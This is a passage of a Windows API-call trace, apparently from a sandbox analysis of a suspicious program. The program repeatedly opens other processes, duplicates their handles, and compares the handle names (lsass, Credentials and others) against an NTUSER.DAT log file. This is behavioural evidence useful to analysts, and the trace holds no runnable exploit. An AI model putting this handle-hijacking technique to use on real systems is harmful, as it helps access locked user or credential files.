(dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.549] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.549] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.550] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.551] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.551] CloseHandle (hObject=0x670) returned 1 [0152.551] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.551] CloseHandle (hObject=0x680) returned 1 [0152.551] CloseHandle (hObject=0x62c) returned 1 [0152.551] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.551] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.551] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.552] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.553] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.553] CloseHandle (hObject=0x670) returned 1 [0152.553] CloseHandle (hObject=0x680) returned 1 [0152.553] CloseHandle (hObject=0x62c) returned 1 [0152.553] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.553] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.553] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.554] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.554] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.555] CloseHandle (hObject=0x670) returned 1 [0152.555] CloseHandle (hObject=0x680) returned 1 [0152.555] CloseHandle (hObject=0x62c) returned 1 [0152.555] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.555] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.555] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.555] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.556] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.556] CloseHandle (hObject=0x670) returned 1 [0152.556] _wcsicmp (_Str1="\\Credentials", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0152.556] CloseHandle (hObject=0x680) returned 1 [0152.556] CloseHandle (hObject=0x62c) returned 1 [0152.556] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.556] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x608, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.557] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.557] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.558] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.558] CloseHandle (hObject=0x670) returned 1 [0152.558] _wcsicmp (_Str1="\\Credentials", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0152.558] CloseHandle (hObject=0x680) returned 1 [0152.558] CloseHandle (hObject=0x62c) returned 1 [0152.558] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.558] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x738, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.558] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.559] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.560] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.560] CloseHandle (hObject=0x670) returned 1 [0152.560] _wcsicmp (_Str1="\\CatalogChangeListener-1e0-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0152.560] CloseHandle (hObject=0x680) returned 1 [0152.560] CloseHandle (hObject=0x62c) returned 1 [0152.560] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.560] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x740, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.560] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.561] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.561] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.561] CloseHandle (hObject=0x670) returned 1 [0152.561] CloseHandle (hObject=0x680) returned 1 [0152.562] CloseHandle (hObject=0x62c) returned 1 [0152.562] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.562] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x744, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.562] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.562] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.563] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.563] CloseHandle (hObject=0x670) returned 1 [0152.563] CloseHandle (hObject=0x680) returned 1 [0152.563] CloseHandle (hObject=0x62c) returned 1 [0152.563] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.563] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x74c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.563] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.564] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.566] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.566] CloseHandle (hObject=0x670) returned 1 [0152.566] CloseHandle (hObject=0x680) returned 1 [0152.566] CloseHandle (hObject=0x62c) returned 1 [0152.566] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.566] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x750, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.566] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.567] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.567] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.567] CloseHandle (hObject=0x670) returned 1 [0152.567] CloseHandle (hObject=0x680) returned 1 [0152.568] CloseHandle (hObject=0x62c) returned 1 [0152.568] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0152.568] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.568] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.569] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.569] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.569] CloseHandle (hObject=0x670) returned 1 [0152.569] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.569] CloseHandle (hObject=0x680) returned 1 [0152.569] CloseHandle (hObject=0x62c) returned 1 [0152.569] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0152.570] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x88, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.570] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.570] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.571] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.571] CloseHandle (hObject=0x670) returned 1 [0152.571] CloseHandle (hObject=0x680) returned 1 [0152.571] CloseHandle (hObject=0x62c) returned 1 [0152.571] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0152.571] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.571] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.572] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.573] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.573] CloseHandle (hObject=0x670) returned 1 [0152.573] CloseHandle (hObject=0x680) returned 1 [0152.573] CloseHandle (hObject=0x62c) returned 1 [0152.573] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0152.573] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.573] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.574] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.574] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.574] CloseHandle (hObject=0x670) returned 1 [0152.574] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.574] CloseHandle (hObject=0x680) returned 1 [0152.574] CloseHandle (hObject=0x62c) returned 1 [0152.574] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0152.574] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.575] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.575] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.576] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.576] CloseHandle (hObject=0x670) returned 1 [0152.576] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.576] CloseHandle (hObject=0x680) returned 1 [0152.576] CloseHandle (hObject=0x62c) returned 1 [0152.576] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0152.576] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.576] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.577] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.579] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.579] CloseHandle (hObject=0x670) returned 1 [0152.579] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.579] CloseHandle (hObject=0x680) returned 1 [0152.579] CloseHandle (hObject=0x62c) returned 1 [0152.579] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0152.579] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.579] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.580] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.580] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.581] CloseHandle (hObject=0x670) returned 1 [0152.581] _wcsicmp (_Str1="\\lsm.exe.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.581] CloseHandle (hObject=0x680) returned 1 [0152.581] CloseHandle (hObject=0x62c) returned 1 [0152.581] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0152.581] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.581] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.581] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.582] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.582] CloseHandle (hObject=0x670) returned 1 [0152.582] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.582] CloseHandle (hObject=0x680) returned 1 [0152.583] CloseHandle (hObject=0x62c) returned 1 [0152.583] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0152.583] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.583] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.583] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.584] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.584] CloseHandle (hObject=0x670) returned 1 [0152.584] CloseHandle (hObject=0x680) returned 1 [0152.584] CloseHandle (hObject=0x62c) returned 1 [0152.584] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0152.584] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x280, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.584] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.585] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.585] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.586] CloseHandle (hObject=0x670) returned 1 [0152.586] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0152.586] CloseHandle (hObject=0x680) returned 1 [0152.586] CloseHandle (hObject=0x62c) returned 1 [0152.586] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0152.586] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x284, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.586] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.586] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.587] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.587] CloseHandle (hObject=0x670) returned 1 [0152.587] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0152.587] CloseHandle (hObject=0x680) returned 1 [0152.587] CloseHandle (hObject=0x62c) returned 1 [0152.587] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0152.587] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x288, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.587] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.588] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.589] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.589] CloseHandle (hObject=0x670) returned 1 [0152.589] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0152.589] CloseHandle (hObject=0x680) returned 1 [0152.589] CloseHandle (hObject=0x62c) returned 1 [0152.589] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0152.589] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.590] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.590] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.590] CloseHandle (hObject=0x670) returned 1 [0152.590] CloseHandle (hObject=0x680) returned 1 [0152.590] CloseHandle (hObject=0x62c) returned 1 [0152.591] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0152.591] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.591] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.591] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.592] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.592] CloseHandle (hObject=0x670) returned 1 [0152.592] _wcsicmp (_Str1="\\umpnpmgr.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0152.592] CloseHandle (hObject=0x680) returned 1 [0152.592] CloseHandle (hObject=0x62c) returned 1 [0152.592] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.592] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.592] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.593] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.593] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.593] CloseHandle (hObject=0x670) returned 1 [0152.593] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.593] CloseHandle (hObject=0x680) returned 1 [0152.594] CloseHandle (hObject=0x62c) returned 1 [0152.594] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.594] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x84, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.594] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.595] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.595] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.595] CloseHandle (hObject=0x670) returned 1 [0152.596] CloseHandle (hObject=0x680) returned 1 [0152.596] CloseHandle (hObject=0x62c) returned 1 [0152.596] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.596] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.596] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.596] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.597] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.597] CloseHandle (hObject=0x670) returned 1 [0152.597] CloseHandle (hObject=0x680) returned 1 [0152.597] CloseHandle (hObject=0x62c) returned 1 [0152.597] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.597] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x164, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.597] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, 